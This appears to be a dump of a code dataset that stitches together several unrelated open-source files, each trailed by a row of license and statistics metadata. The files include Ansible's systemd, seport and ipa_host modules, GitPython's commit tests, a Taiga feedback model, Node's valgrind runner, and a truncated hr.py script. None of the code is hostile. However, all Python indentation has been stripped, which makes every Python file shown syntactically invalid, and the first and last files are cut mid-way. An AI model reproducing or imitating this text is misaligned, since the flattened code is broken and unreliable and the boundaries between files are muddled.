(rc, out, err) = module.run_command("%s %s '%s'" % (systemctl, action, unit))
if rc != 0:
module.fail_json(msg="Unable to %s service %s: %s" % (action, unit, out + err))
result['enabled'] = not enabled
# set service state if requested
if module.params['state'] is not None:
fail_if_missing(module, found, unit, msg="host")
# default to desired state
result['state'] = module.params['state']
# What is current service state?
if 'ActiveState' in result['status']:
action = None
if module.params['state'] == 'started':
if not is_running_service(result['status']):
action = 'start'
elif module.params['state'] == 'stopped':
if is_running_service(result['status']):
action = 'stop'
else:
if not is_running_service(result['status']):
action = 'start'
else:
action = module.params['state'][:-2] # remove 'ed' from restarted/reloaded
result['state'] = 'started'
if action:
result['changed'] = True
if not module.check_mode:
(rc, out, err) = module.run_command("%s %s '%s'" % (systemctl, action, unit))
if rc != 0:
module.fail_json(msg="Unable to %s service %s: %s" % (action, unit, err))
else:
# this should not happen?
module.fail_json(msg="Service is in unknown state", status=result['status'])
module.exit_json(**result)
if __name__ == '__main__':
main()
| gpl-3.0 | 6,874,354,297,627,575,000 | 37.086047 | 182 | 0.546071 | false |
analurandis/Tur | backend/venv/Lib/site-packages/git/test/test_commit.py | 2 | 12355 | # -*- coding: utf-8 -*-
# test_commit.py
# Copyright (C) 2008, 2009 Michael Trier ([email protected]) and contributors
#
# This module is part of GitPython and is released under
# the BSD License: http://www.opensource.org/licenses/bsd-license.php
from __future__ import print_function
from git.test.lib import (
TestBase,
assert_equal,
assert_not_equal,
with_rw_repo,
fixture_path,
StringProcessAdapter
)
from git import (
Commit,
Actor,
)
from gitdb import IStream
from git.compat import (
string_types,
text_type
)
from io import BytesIO
import time
import sys
import re
def assert_commit_serialization(rwrepo, commit_id, print_performance_info=False):
"""traverse all commits in the history of commit identified by commit_id and check
if the serialization works.
:param print_performance_info: if True, we will show how fast we are"""
ns = 0 # num serializations
nds = 0 # num deserializations
st = time.time()
for cm in rwrepo.commit(commit_id).traverse():
nds += 1
# assert that we deserialize commits correctly, hence we get the same
# sha on serialization
stream = BytesIO()
cm._serialize(stream)
ns += 1
streamlen = stream.tell()
stream.seek(0)
istream = rwrepo.odb.store(IStream(Commit.type, streamlen, stream))
assert istream.hexsha == cm.hexsha.encode('ascii')
nc = Commit(rwrepo, Commit.NULL_BIN_SHA, cm.tree,
cm.author, cm.authored_date, cm.author_tz_offset,
cm.committer, cm.committed_date, cm.committer_tz_offset,
cm.message, cm.parents, cm.encoding)
assert nc.parents == cm.parents
stream = BytesIO()
nc._serialize(stream)
ns += 1
streamlen = stream.tell()
stream.seek(0)
# reuse istream
istream.size = streamlen
istream.stream = stream
istream.binsha = None
nc.binsha = rwrepo.odb.store(istream).binsha
# if it worked, we have exactly the same contents !
assert nc.hexsha == cm.hexsha
# END check commits
elapsed = time.time() - st
if print_performance_info:
print("Serialized %i and deserialized %i commits in %f s ( (%f, %f) commits / s"
% (ns, nds, elapsed, ns / elapsed, nds / elapsed), file=sys.stderr)
# END handle performance info
class TestCommit(TestBase):
def test_bake(self):
commit = self.rorepo.commit('2454ae89983a4496a445ce347d7a41c0bb0ea7ae')
# commits have no dict
self.failUnlessRaises(AttributeError, setattr, commit, 'someattr', 1)
commit.author # bake
assert_equal("Sebastian Thiel", commit.author.name)
assert_equal("[email protected]", commit.author.email)
assert commit.author == commit.committer
assert isinstance(commit.authored_date, int) and isinstance(commit.committed_date, int)
assert isinstance(commit.author_tz_offset, int) and isinstance(commit.committer_tz_offset, int)
assert commit.message == "Added missing information to docstrings of commit and stats module\n"
def test_stats(self):
commit = self.rorepo.commit('33ebe7acec14b25c5f84f35a664803fcab2f7781')
stats = commit.stats
def check_entries(d):
assert isinstance(d, dict)
for key in ("insertions", "deletions", "lines"):
assert key in d
# END assertion helper
assert stats.files
assert stats.total
check_entries(stats.total)
assert "files" in stats.total
for filepath, d in stats.files.items():
check_entries(d)
# END for each stated file
# assure data is parsed properly
michael = Actor._from_string("Michael Trier <[email protected]>")
assert commit.author == michael
assert commit.committer == michael
assert commit.authored_date == 1210193388
assert commit.committed_date == 1210193388
assert commit.author_tz_offset == 14400, commit.author_tz_offset
assert commit.committer_tz_offset == 14400, commit.committer_tz_offset
assert commit.message == "initial project\n"
def test_unicode_actor(self):
# assure we can parse unicode actors correctly
name = u"Üäöß ÄußÉ"
assert len(name) == 9
special = Actor._from_string(u"%s <[email protected]>" % name)
assert special.name == name
assert isinstance(special.name, text_type)
def test_traversal(self):
start = self.rorepo.commit("a4d06724202afccd2b5c54f81bcf2bf26dea7fff")
first = self.rorepo.commit("33ebe7acec14b25c5f84f35a664803fcab2f7781")
p0 = start.parents[0]
p1 = start.parents[1]
p00 = p0.parents[0]
p10 = p1.parents[0]
# basic branch first, depth first
dfirst = start.traverse(branch_first=False)
bfirst = start.traverse(branch_first=True)
assert next(dfirst) == p0
assert next(dfirst) == p00
assert next(bfirst) == p0
assert next(bfirst) == p1
assert next(bfirst) == p00
assert next(bfirst) == p10
# at some point, both iterations should stop
assert list(bfirst)[-1] == first
stoptraverse = self.rorepo.commit("254d04aa3180eb8b8daf7b7ff25f010cd69b4e7d").traverse(as_edge=True)
l = list(stoptraverse)
assert len(l[0]) == 2
# ignore self
assert next(start.traverse(ignore_self=False)) == start
# depth
assert len(list(start.traverse(ignore_self=False, depth=0))) == 1
# prune
assert next(start.traverse(branch_first=1, prune=lambda i, d: i == p0)) == p1
# predicate
assert next(start.traverse(branch_first=1, predicate=lambda i, d: i == p1)) == p1
# traversal should stop when the beginning is reached
self.failUnlessRaises(StopIteration, next, first.traverse())
# parents of the first commit should be empty ( as the only parent has a null
# sha )
assert len(first.parents) == 0
def test_iteration(self):
# we can iterate commits
all_commits = Commit.list_items(self.rorepo, self.rorepo.head)
assert all_commits
assert all_commits == list(self.rorepo.iter_commits())
# this includes merge commits
mcomit = self.rorepo.commit('d884adc80c80300b4cc05321494713904ef1df2d')
assert mcomit in all_commits
# we can limit the result to paths
ltd_commits = list(self.rorepo.iter_commits(paths='CHANGES'))
assert ltd_commits and len(ltd_commits) < len(all_commits)
# show commits of multiple paths, resulting in a union of commits
less_ltd_commits = list(Commit.iter_items(self.rorepo, 'master', paths=('CHANGES', 'AUTHORS')))
assert len(ltd_commits) < len(less_ltd_commits)
def test_iter_items(self):
# pretty not allowed
self.failUnlessRaises(ValueError, Commit.iter_items, self.rorepo, 'master', pretty="raw")
def test_rev_list_bisect_all(self):
"""
'git rev-list --bisect-all' returns additional information
in the commit header. This test ensures that we properly parse it.
"""
revs = self.rorepo.git.rev_list('933d23bf95a5bd1624fbcdf328d904e1fa173474',
first_parent=True,
bisect_all=True)
commits = Commit._iter_from_process_or_stream(self.rorepo, StringProcessAdapter(revs.encode('ascii')))
expected_ids = (
'7156cece3c49544abb6bf7a0c218eb36646fad6d',
'1f66cfbbce58b4b552b041707a12d437cc5f400a',
'33ebe7acec14b25c5f84f35a664803fcab2f7781',
'933d23bf95a5bd1624fbcdf328d904e1fa173474'
)
for sha1, commit in zip(expected_ids, commits):
assert_equal(sha1, commit.hexsha)
def test_count(self):
assert self.rorepo.tag('refs/tags/0.1.5').commit.count() == 143
def test_list(self):
# This doesn't work anymore, as we will either attempt getattr with bytes, or compare 20 byte string
# with actual 20 byte bytes. This usage makes no sense anyway
assert isinstance(Commit.list_items(self.rorepo, '0.1.5', max_count=5)[
'5117c9c8a4d3af19a9958677e45cda9269de1541'], Commit)
def test_str(self):
commit = Commit(self.rorepo, Commit.NULL_BIN_SHA)
assert_equal(Commit.NULL_HEX_SHA, str(commit))
def test_repr(self):
commit = Commit(self.rorepo, Commit.NULL_BIN_SHA)
assert_equal('<git.Commit "%s">' % Commit.NULL_HEX_SHA, repr(commit))
def test_equality(self):
commit1 = Commit(self.rorepo, Commit.NULL_BIN_SHA)
commit2 = Commit(self.rorepo, Commit.NULL_BIN_SHA)
commit3 = Commit(self.rorepo, "\1" * 20)
assert_equal(commit1, commit2)
assert_not_equal(commit2, commit3)
def test_iter_parents(self):
# should return all but ourselves, even if skip is defined
c = self.rorepo.commit('0.1.5')
for skip in (0, 1):
piter = c.iter_parents(skip=skip)
first_parent = next(piter)
assert first_parent != c
assert first_parent == c.parents[0]
# END for each
def test_name_rev(self):
name_rev = self.rorepo.head.commit.name_rev
assert isinstance(name_rev, string_types)
@with_rw_repo('HEAD', bare=True)
def test_serialization(self, rwrepo):
# create all commits of our repo
assert_commit_serialization(rwrepo, '0.1.6')
def test_serialization_unicode_support(self):
assert Commit.default_encoding.lower() == 'utf-8'
# create a commit with unicode in the message, and the author's name
# Verify its serialization and deserialization
cmt = self.rorepo.commit('0.1.6')
assert isinstance(cmt.message, text_type) # it automatically decodes it as such
assert isinstance(cmt.author.name, text_type) # same here
cmt.message = u"üäêèß"
assert len(cmt.message) == 5
cmt.author.name = u"äüß"
assert len(cmt.author.name) == 3
cstream = BytesIO()
cmt._serialize(cstream)
cstream.seek(0)
assert len(cstream.getvalue())
ncmt = Commit(self.rorepo, cmt.binsha)
ncmt._deserialize(cstream)
assert cmt.author.name == ncmt.author.name
assert cmt.message == ncmt.message
# actually, it can't be printed in a shell as repr wants to have ascii only
# it appears
cmt.author.__repr__()
def test_gpgsig(self):
cmt = self.rorepo.commit()
cmt._deserialize(open(fixture_path('commit_with_gpgsig'), 'rb'))
fixture_sig = """-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)
iQIcBAABAgAGBQJRk8zMAAoJEG5mS6x6i9IjsTEP/0v2Wx/i7dqyKban6XMIhVdj
uI0DycfXqnCCZmejidzeao+P+cuK/ZAA/b9fU4MtwkDm2USvnIOrB00W0isxsrED
sdv6uJNa2ybGjxBolLrfQcWutxGXLZ1FGRhEvkPTLMHHvVriKoNFXcS7ewxP9MBf
NH97K2wauqA+J4BDLDHQJgADCOmLrGTAU+G1eAXHIschDqa6PZMH5nInetYZONDh
3SkOOv8VKFIF7gu8X7HC+7+Y8k8U0TW0cjlQ2icinwCc+KFoG6GwXS7u/VqIo1Yp
Tack6sxIdK7NXJhV5gAeAOMJBGhO0fHl8UUr96vGEKwtxyZhWf8cuIPOWLk06jA0
g9DpLqmy/pvyRfiPci+24YdYRBua/vta+yo/Lp85N7Hu/cpIh+q5WSLvUlv09Dmo
TTTG8Hf6s3lEej7W8z2xcNZoB6GwXd8buSDU8cu0I6mEO9sNtAuUOHp2dBvTA6cX
PuQW8jg3zofnx7CyNcd3KF3nh2z8mBcDLgh0Q84srZJCPRuxRcp9ylggvAG7iaNd
XMNvSK8IZtWLkx7k3A3QYt1cN4y1zdSHLR2S+BVCEJea1mvUE+jK5wiB9S4XNtKm
BX/otlTa8pNE3fWYBxURvfHnMY4i3HQT7Bc1QjImAhMnyo2vJk4ORBJIZ1FTNIhJ
JzJMZDRLQLFvnzqZuCjE
=przd
-----END PGP SIGNATURE-----"""
assert cmt.gpgsig == fixture_sig
cmt.gpgsig = "<test\ndummy\nsig>"
assert cmt.gpgsig != fixture_sig
cstream = BytesIO()
cmt._serialize(cstream)
assert re.search(r"^gpgsig <test\n dummy\n sig>$", cstream.getvalue().decode('ascii'), re.MULTILINE)
cstream.seek(0)
cmt.gpgsig = None
cmt._deserialize(cstream)
assert cmt.gpgsig == "<test\ndummy\nsig>"
cmt.gpgsig = None
cstream = BytesIO()
cmt._serialize(cstream)
assert not re.search(r"^gpgsig ", cstream.getvalue().decode('ascii'), re.MULTILINE)
| mit | -6,085,914,519,278,853,000 | 36.168675 | 110 | 0.647326 | false |
Jorge-Rodriguez/ansible | lib/ansible/modules/system/seport.py | 4 | 8442 | #!/usr/bin/python
# Copyright: (c) 2014, Dan Keder <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: seport
short_description: Manages SELinux network port type definitions
description:
- Manages SELinux network port type definitions.
version_added: "2.0"
options:
ports:
description:
- Ports or port ranges. Can be a list (since 2.6) or comma separated string.
required: true
proto:
description:
- Protocol for the specified port.
required: true
choices: [ tcp, udp ]
setype:
description:
- SELinux type for the specified port.
required: true
state:
description:
- Desired state of the SELinux port type definition.
required: true
choices: [ absent, present ]
default: present
reload:
description:
- Reload SELinux policy after commit.
type: bool
default: 'yes'
ignore_selinux_state:
description:
- Run independent of selinux runtime state
type: bool
default: false
version_added: '2.8'
notes:
- The changes are persistent across reboots.
- Not tested on any Debian-based system.
requirements:
- libselinux-python
- policycoreutils-python
author:
- Dan Keder (@dankeder)
'''
EXAMPLES = '''
- name: Allow Apache to listen on tcp port 8888
seport:
ports: 8888
proto: tcp
setype: http_port_t
state: present
- name: Allow sshd to listen on tcp port 8991
seport:
ports: 8991
proto: tcp
setype: ssh_port_t
state: present
- name: Allow memcached to listen on tcp ports 10000-10100 and 10112
seport:
ports: 10000-10100,10112
proto: tcp
setype: memcache_port_t
state: present
- name: Allow memcached to listen on tcp ports 10000-10100 and 10112
seport:
ports:
- 10000-10100
- 10112
proto: tcp
setype: memcache_port_t
state: present
'''
import traceback
SELINUX_IMP_ERR = None
try:
import selinux
HAVE_SELINUX = True
except ImportError:
SELINUX_IMP_ERR = traceback.format_exc()
HAVE_SELINUX = False
SEOBJECT_IMP_ERR = None
try:
import seobject
HAVE_SEOBJECT = True
except ImportError:
SEOBJECT_IMP_ERR = traceback.format_exc()
HAVE_SEOBJECT = False
from ansible.module_utils.basic import AnsibleModule, missing_required_lib
from ansible.module_utils._text import to_native
def get_runtime_status(ignore_selinux_state=False):
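# When ignore_selinux_state is set, report SELinux as enabled regardless of the actual runtime state.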
return True if ignore_selinux_state is True else selinux.is_selinux_enabled()
def semanage_port_get_ports(seport, setype, proto):
""" Get the list of ports that have the specified type definition.
:param seport: Instance of seobject.portRecords
:type setype: str
:param setype: SELinux type.
:type proto: str
:param proto: Protocol ('tcp' or 'udp')
:rtype: list
:return: List of ports that have the specified SELinux type.
"""
records = seport.get_all_by_type()
if (setype, proto) in records:
return records[(setype, proto)]
else:
return []
def semanage_port_get_type(seport, port, proto):
""" Get the SELinux type of the specified port.
:param seport: Instance of seobject.portRecords
:type port: str
:param port: Port or port range (example: "8080", "8080-9090")
:type proto: str
:param proto: Protocol ('tcp' or 'udp')
:rtype: tuple
:return: Tuple containing the SELinux type and MLS/MCS level, or None if not found.
"""
ports = port.split('-', 1)
if len(ports) == 1:
ports.extend(ports)
key = (int(ports[0]), int(ports[1]), proto)
records = seport.get_all()
if key in records:
return records[key]
else:
return None
def semanage_port_add(module, ports, proto, setype, do_reload, serange='s0', sestore=''):
""" Add SELinux port type definition to the policy.
:type module: AnsibleModule
:param module: Ansible module
:type ports: list
:param ports: List of ports and port ranges to add (e.g. ["8080", "8080-9090"])
:type proto: str
:param proto: Protocol ('tcp' or 'udp')
:type setype: str
:param setype: SELinux type
:type do_reload: bool
:param do_reload: Whether to reload SELinux policy after commit
:type serange: str
:param serange: SELinux MLS/MCS range (defaults to 's0')
:type sestore: str
:param sestore: SELinux store
:rtype: bool
:return: True if the policy was changed, otherwise False
"""
try:
seport = seobject.portRecords(sestore)
seport.set_reload(do_reload)
change = False
ports_by_type = semanage_port_get_ports(seport, setype, proto)
for port in ports:
if port not in ports_by_type:
change = True
port_type = semanage_port_get_type(seport, port, proto)
if port_type is None and not module.check_mode:
seport.add(port, proto, serange, setype)
elif port_type is not None and not module.check_mode:
seport.modify(port, proto, serange, setype)
except (ValueError, IOError, KeyError, OSError, RuntimeError) as e:
module.fail_json(msg="%s: %s\n" % (e.__class__.__name__, to_native(e)), exception=traceback.format_exc())
return change
def semanage_port_del(module, ports, proto, setype, do_reload, sestore=''):
""" Delete SELinux port type definition from the policy.
:type module: AnsibleModule
:param module: Ansible module
:type ports: list
:param ports: List of ports and port ranges to delete (e.g. ["8080", "8080-9090"])
:type proto: str
:param proto: Protocol ('tcp' or 'udp')
:type setype: str
:param setype: SELinux type.
:type do_reload: bool
:param do_reload: Whether to reload SELinux policy after commit
:type sestore: str
:param sestore: SELinux store
:rtype: bool
:return: True if the policy was changed, otherwise False
"""
try:
seport = seobject.portRecords(sestore)
seport.set_reload(do_reload)
change = False
ports_by_type = semanage_port_get_ports(seport, setype, proto)
for port in ports:
if port in ports_by_type:
change = True
if not module.check_mode:
seport.delete(port, proto)
except (ValueError, IOError, KeyError, OSError, RuntimeError) as e:
module.fail_json(msg="%s: %s\n" % (e.__class__.__name__, to_native(e)), exception=traceback.format_exc())
return change
def main():
module = AnsibleModule(
argument_spec=dict(
ignore_selinux_state=dict(type='bool', default=False),
ports=dict(type='list', required=True),
proto=dict(type='str', required=True, choices=['tcp', 'udp']),
setype=dict(type='str', required=True),
state=dict(type='str', required=True, choices=['absent', 'present']),
reload=dict(type='bool', default=True),
),
supports_check_mode=True,
)
if not HAVE_SELINUX:
module.fail_json(msg=missing_required_lib("libselinux-python"), exception=SELINUX_IMP_ERR)
if not HAVE_SEOBJECT:
module.fail_json(msg=missing_required_lib("policycoreutils-python"), exception=SEOBJECT_IMP_ERR)
ignore_selinux_state = module.params['ignore_selinux_state']
if not get_runtime_status(ignore_selinux_state):
module.fail_json(msg="SELinux is disabled on this host.")
ports = module.params['ports']
proto = module.params['proto']
setype = module.params['setype']
state = module.params['state']
do_reload = module.params['reload']
result = {
'ports': ports,
'proto': proto,
'setype': setype,
'state': state,
}
if state == 'present':
result['changed'] = semanage_port_add(module, ports, proto, setype, do_reload)
elif state == 'absent':
result['changed'] = semanage_port_del(module, ports, proto, setype, do_reload)
else:
module.fail_json(msg='Invalid value of argument "state": {0}'.format(state))
module.exit_json(**result)
if __name__ == '__main__':
main()
| gpl-3.0 | -3,285,057,386,472,222,000 | 26.953642 | 113 | 0.637645 | false |
Zaneh-/bearded-tribble-back | taiga/feedback/models.py | 21 | 1633 | # Copyright (C) 2014 Andrey Antukh <[email protected]>
# Copyright (C) 2014 Jesús Espino <[email protected]>
# Copyright (C) 2014 David Barragán <[email protected]>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.db import models
from django.utils.translation import ugettext_lazy as _
class FeedbackEntry(models.Model):
full_name = models.CharField(null=False, blank=False, max_length=256,
verbose_name=_('full name'))
email = models.EmailField(null=False, blank=False, max_length=255,
verbose_name=_('email address'))
comment = models.TextField(null=False, blank=False,
verbose_name=_("comment"))
created_date = models.DateTimeField(null=False, blank=False, auto_now_add=True,
verbose_name=_("created date"))
class Meta:
verbose_name = "feedback entry"
verbose_name_plural = "feedback entries"
ordering = ["-created_date", "id"]
| agpl-3.0 | -8,765,439,346,029,666,000 | 46.970588 | 83 | 0.676272 | false |
lexor90/node-compiler | node/tools/run-valgrind.py | 5 | 2519 | #!/usr/bin/env python
#
# Copyright 2009 the V8 project authors. All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from os import path
import subprocess
import sys
NODE_ROOT = path.dirname(path.dirname(path.abspath(__file__)))
VALGRIND_ARGUMENTS = [
'valgrind',
'--error-exitcode=1',
'--smc-check=all',
# Node.js does not clean up on exit so don't complain about
# memory leaks but do complain about invalid memory access.
'--quiet',
]
if len(sys.argv) < 2:
print 'Please provide an executable to analyze.'
sys.exit(1)
executable = path.join(NODE_ROOT, sys.argv[1])
if not path.exists(executable):
print 'Cannot find the file specified: %s' % executable
sys.exit(1)
# Compute the command line.
command = VALGRIND_ARGUMENTS + [executable] + sys.argv[2:]
# Run valgrind.
process = subprocess.Popen(command, stderr=subprocess.PIPE)
code = process.wait()
errors = process.stderr.readlines()
# If valgrind produced an error, we report that to the user.
if code != 0:
sys.stderr.writelines(errors)
sys.exit(code)
| mit | -1,382,701,634,226,333,400 | 37.753846 | 72 | 0.745931 | false |
DepthDeluxe/ansible | lib/ansible/modules/identity/ipa/ipa_host.py | 22 | 10210 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: ipa_host
author: Thomas Krahn (@Nosmoht)
short_description: Manage FreeIPA host
description:
- Add, modify and delete an IPA host using IPA API
options:
fqdn:
description:
- Fully qualified domain name.
- Can not be changed as it is the unique identifier.
required: true
aliases: ["name"]
description:
description:
- A description of this host.
required: false
force:
description:
- Force host name even if not in DNS.
required: false
ip_address:
description:
- Add the host to DNS with this IP address.
required: false
mac_address:
description:
- List of hardware MAC address(es) of this host.
- If option is omitted MAC addresses will not be checked or changed.
- If an empty list is passed all assigned MAC addresses will be removed.
- MAC addresses that are already assigned but not passed will be removed.
required: false
aliases: ["macaddress"]
ns_host_location:
description:
- Host location (e.g. "Lab 2")
required: false
aliases: ["nshostlocation"]
ns_hardware_platform:
description:
- Host hardware platform (e.g. "Lenovo T61")
required: false
aliases: ["nshardwareplatform"]
ns_os_version:
description:
- Host operating system and version (e.g. "Fedora 9")
required: false
aliases: ["nsosversion"]
user_certificate:
description:
- List of Base-64 encoded server certificates.
- If option is omitted certificates will not be checked or changed.
- If an empty list is passed all assigned certificates will be removed.
- Certificates already assigned but not passed will be removed.
required: false
aliases: ["usercertificate"]
state:
description: State to ensure
required: false
default: present
choices: ["present", "absent", "disabled"]
ipa_port:
description: Port of IPA server
required: false
default: 443
ipa_host:
description: IP or hostname of IPA server
required: false
default: ipa.example.com
ipa_user:
description: Administrative account used on IPA server
required: false
default: admin
ipa_pass:
description: Password of administrative user
required: true
ipa_prot:
description: Protocol used by IPA server
required: false
default: https
choices: ["http", "https"]
validate_certs:
description:
- This only applies if C(ipa_prot) is I(https).
- If set to C(no), the SSL certificates will not be validated.
- This should only be set to C(no) on personally controlled sites using self-signed certificates.
required: false
default: true
version_added: "2.3"
'''
EXAMPLES = '''
# Ensure host is present
- ipa_host:
name: host01.example.com
description: Example host
ip_address: 192.168.0.123
ns_host_location: Lab
ns_os_version: CentOS 7
ns_hardware_platform: Lenovo T61
mac_address:
- "08:00:27:E3:B1:2D"
- "52:54:00:BD:97:1E"
state: present
ipa_host: ipa.example.com
ipa_user: admin
ipa_pass: topsecret
# Ensure host is disabled
- ipa_host:
name: host01.example.com
state: disabled
ipa_host: ipa.example.com
ipa_user: admin
ipa_pass: topsecret
# Ensure that all user certificates are removed
- ipa_host:
name: host01.example.com
user_certificate: []
ipa_host: ipa.example.com
ipa_user: admin
ipa_pass: topsecret
# Ensure host is absent
- ipa_host:
name: host01.example.com
state: absent
ipa_host: ipa.example.com
ipa_user: admin
ipa_pass: topsecret
'''
RETURN = '''
host:
description: Host as returned by IPA API.
returned: always
type: dict
host_diff:
description: List of options that differ and would be changed
returned: if check mode and a difference is found
type: list
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.pycompat24 import get_exception
from ansible.module_utils.ipa import IPAClient
class HostIPAClient(IPAClient):
def __init__(self, module, host, port, protocol):
super(HostIPAClient, self).__init__(module, host, port, protocol)
def host_find(self, name):
return self._post_json(method='host_find', name=None, item={'all': True, 'fqdn': name})
def host_add(self, name, host):
return self._post_json(method='host_add', name=name, item=host)
def host_mod(self, name, host):
return self._post_json(method='host_mod', name=name, item=host)
def host_del(self, name):
return self._post_json(method='host_del', name=name)
def host_disable(self, name):
return self._post_json(method='host_disable', name=name)
def get_host_dict(description=None, force=None, ip_address=None, ns_host_location=None, ns_hardware_platform=None,
ns_os_version=None, user_certificate=None, mac_address=None):
data = {}
if description is not None:
data['description'] = description
if force is not None:
data['force'] = force
if ip_address is not None:
data['ip_address'] = ip_address
if ns_host_location is not None:
data['nshostlocation'] = ns_host_location
if ns_hardware_platform is not None:
data['nshardwareplatform'] = ns_hardware_platform
if ns_os_version is not None:
data['nsosversion'] = ns_os_version
if user_certificate is not None:
data['usercertificate'] = [{"__base64__": item} for item in user_certificate]
if mac_address is not None:
data['macaddress'] = mac_address
return data
def get_host_diff(client, ipa_host, module_host):
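# 'force' and 'ip_address' are creation-time options only, so they are excluded from the modification diff.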
non_updateable_keys = ['force', 'ip_address']
for key in non_updateable_keys:
if key in module_host:
del module_host[key]
return client.get_diff(ipa_data=ipa_host, module_data=module_host)
def ensure(module, client):
name = module.params['name']
state = module.params['state']
ipa_host = client.host_find(name=name)
module_host = get_host_dict(description=module.params['description'],
force=module.params['force'], ip_address=module.params['ip_address'],
ns_host_location=module.params['ns_host_location'],
ns_hardware_platform=module.params['ns_hardware_platform'],
ns_os_version=module.params['ns_os_version'],
user_certificate=module.params['user_certificate'],
mac_address=module.params['mac_address'])
changed = False
if state in ['present', 'enabled', 'disabled']:
if not ipa_host:
changed = True
if not module.check_mode:
client.host_add(name=name, host=module_host)
else:
diff = get_host_diff(client, ipa_host, module_host)
if len(diff) > 0:
changed = True
if not module.check_mode:
data = {}
for key in diff:
data[key] = module_host.get(key)
client.host_mod(name=name, host=data)
else:
if ipa_host:
changed = True
if not module.check_mode:
client.host_del(name=name)
return changed, client.host_find(name=name)
def main():
module = AnsibleModule(
argument_spec=dict(
description=dict(type='str', required=False),
fqdn=dict(type='str', required=True, aliases=['name']),
force=dict(type='bool', required=False),
ip_address=dict(type='str', required=False),
ns_host_location=dict(type='str', required=False, aliases=['nshostlocation']),
ns_hardware_platform=dict(type='str', required=False, aliases=['nshardwareplatform']),
ns_os_version=dict(type='str', required=False, aliases=['nsosversion']),
user_certificate=dict(type='list', required=False, aliases=['usercertificate']),
mac_address=dict(type='list', required=False, aliases=['macaddress']),
state=dict(type='str', required=False, default='present',
choices=['present', 'absent', 'enabled', 'disabled']),
ipa_prot=dict(type='str', required=False, default='https', choices=['http', 'https']),
ipa_host=dict(type='str', required=False, default='ipa.example.com'),
ipa_port=dict(type='int', required=False, default=443),
ipa_user=dict(type='str', required=False, default='admin'),
ipa_pass=dict(type='str', required=True, no_log=True),
validate_certs=dict(type='bool', required=False, default=True),
),
supports_check_mode=True,
)
client = HostIPAClient(module=module,
host=module.params['ipa_host'],
port=module.params['ipa_port'],
protocol=module.params['ipa_prot'])
try:
client.login(username=module.params['ipa_user'],
password=module.params['ipa_pass'])
changed, host = ensure(module, client)
module.exit_json(changed=changed, host=host)
except Exception:
e = get_exception()
module.fail_json(msg=str(e))
if __name__ == '__main__':
main()
| gpl-3.0 | 2,483,066,706,811,936,000 | 32.920266 | 114 | 0.632321 | false |
hammerhorn/working | hr.py | 1 | 2015 | #!/usr/bin/env python3
"""
Produces horizontal lines for use in shell scripts.
usage: hr.py [-h] [-w WIDTH] [-p PATTERN] [-c]
optional arguments:
-h, --help show this help message and exit
-w WIDTH, --width WIDTH
-p PATTERN, --pattern PATTERN
-c, --center
* floats should give screenwidths, ints should give charwidths
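example (illustrative): hr.py -w 0.5 -p '=' -c -> a centered line of '=' spanning half the terminal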
"""
import argparse
from versatiledialogs.terminal import Terminal
__author__ = 'Chris Horn <[email protected]>'
__license__ = 'GPL'
Terminal()
def _parse_args():
"""
Parse all args and return 'args' namespace.
"""
parser = argparse.ArgumentParser(
description='Produces horizontal lines for use in shell scripts.')
parser.add_argument(
'-w', '--width', type=float, help='width in columns or width in ' +
'screenwidths')
parser.add_argument(
'-p', '--pattern', type=str, help='symbol or sequence of symbols')
parser.add_argument(
'-c', '--center',
action='store_true',
help='centered (default is left-aligned)')
return parser.parse_args()
ARGS = _parse_args() if __name__ == '__main__' else None
# If ARGS.width is an int, it means: width in columns. #
# If it's < 1, it means: a fraction of the terminal width. #
if ARGS is not None and ARGS.width is not None and (ARGS.width == int(ARGS.width)):
ARGS.width = int(ARGS.width)
